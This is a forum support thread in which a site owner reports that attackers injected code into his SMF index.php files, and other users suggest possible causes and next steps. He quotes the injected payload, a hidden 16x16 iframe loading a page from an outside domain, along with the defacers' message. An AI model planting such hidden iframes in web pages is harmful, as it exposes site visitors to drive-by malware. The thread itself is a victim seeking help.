script kiddies protection

[DefTol]

I have this group who seems to love pissing around with my index.php files.

They add a code that tries to launch an applet called BaaaBaa by using something

called mytabscounter.info/z-ping-ov.php.also z-java1.php

They leave a little html code which says this.....

IN THE NAME OF ALLAH (GOD)

Hacked By Tornado Digital Security Team

We Are : [Tornado] [Dr.G] [[Dark Angel] [Amirzed55] [Dasharash]

I am not sure how the hell they are gaining access to the index.php files.

Is there a good way to stop the script kiddies?

[xenovanis]

Can you find anything in the apache errorlogs? Looks like they somehow gained serveraccess, either through your site but it could be anyones site. First, inform your host and if think this was caused by SMF, please fill in this form:
http://www.simplemachines.org/about/security.php

Good luck 

[DefTol]

I found it was on the server side.

There excuse is to say that some are using outdated scripts.

Now all the index.php files screwed up by this attack,were the ones that came with the smf 1.1.2 upgrade,so how could anything be outdated already?

The code loaded into every index.php file was this one

Code Select Expand

<iframe name="counter" src="http://mystabcounter.info/index2.php" height="16" width="16" frameborder="0" scrolling="no"></iframe> <iframe name="counter" src="http://mystabcounter.info/index2.php" height="16" width="16" frameborder="0" scrolling="no"></iframe>

[metallica48423]

i think they are referring to server level scripts, apache and mySQL and such.

[青山 素子]

It could also be they got int through another site using insecure code, and then were able to mess with other sites as well.